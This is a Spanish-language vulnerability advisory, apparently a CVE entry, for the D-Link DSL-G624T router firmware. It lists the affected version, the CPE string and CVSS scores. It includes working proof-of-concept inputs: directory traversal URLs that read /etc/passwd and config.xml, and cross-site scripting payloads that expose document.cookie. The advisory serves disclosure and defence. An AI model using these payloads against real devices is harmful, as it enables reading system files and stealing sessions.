Vulnerabilidad de recorrido de directorios en cgi-bin/webcm en el firmware D-Link DSL-G624T 3.00B01T01.YA-C.20060616 permite a atacantes remotos leer archivos arbitrarios a través de un .. (punto punto) en el parámetro getpage.
Investigador
José Ramón Palanco: jpalanco@gmail.com
Detalles
Vulnerabilidades
Recorrido de directorios
Ejemplos:
http://router/cgi-bin/webcm?getpage=/./././././././etc/passwd
http://router/cgi-bin/webcm?getpage=/./././././././etc/config.xml
Cross Site Scripting
URL afectada: http://router/cgi-bin/webcm
| Método | Variable | Valor |
|---|---|---|
| POST | upnp%3Asettings%2Fstate | >”><ScRiPt%20%0a%0d>alert(document.cookie)%3B |
| POST | upnp%3Asettings%2Fconnection | >”><ScRiPt%20%0a%0d>alert(document.cookie)%3B |
| POST | upnp%3Asettings%2Fconnection | ”+onmouseover=“alert(document.cookie) |
Listado de directorios
Afectado: directorio /cgi-bin
Productos y Versiones
- Vendedor: D-LINK
- Producto: DSL-G624T
- Versión: V3.00B01T01.YA-C.20060616
CPE v2.3
cpe:2.3:h:d-link:dsl-g624t:firmware3.00b01t01.ya_c.2006-06-16::::::_:*
Puntuaciones CVSS y Tipos de Vulnerabilidad
| Nombre | Valor |
|---|---|
| Puntuación CVSS | 5.0 |
| Impacto en Confidencialidad | Parcial (Hay una considerable divulgación de información.) |
| Impacto en Integridad | Ninguno (No hay impacto en la integridad del sistema) |
| Impacto en Disponibilidad | Ninguno (No hay impacto en la disponibilidad del sistema.) |
| Complejidad de Acceso | Baja (No existen condiciones de acceso especializadas ni circunstancias atenuantes. Se requiere muy poco conocimiento o habilidad para explotar.) |
| Autenticación | No requerida (No se requiere autenticación para explotar la vulnerabilidad.) |
| Acceso Obtenido | Ninguno |
| Tipo(s) de Vulnerabilidad | Recorrido de directorios |
| ID CWE | El ID CWE no está definido para esta vulnerabilidad |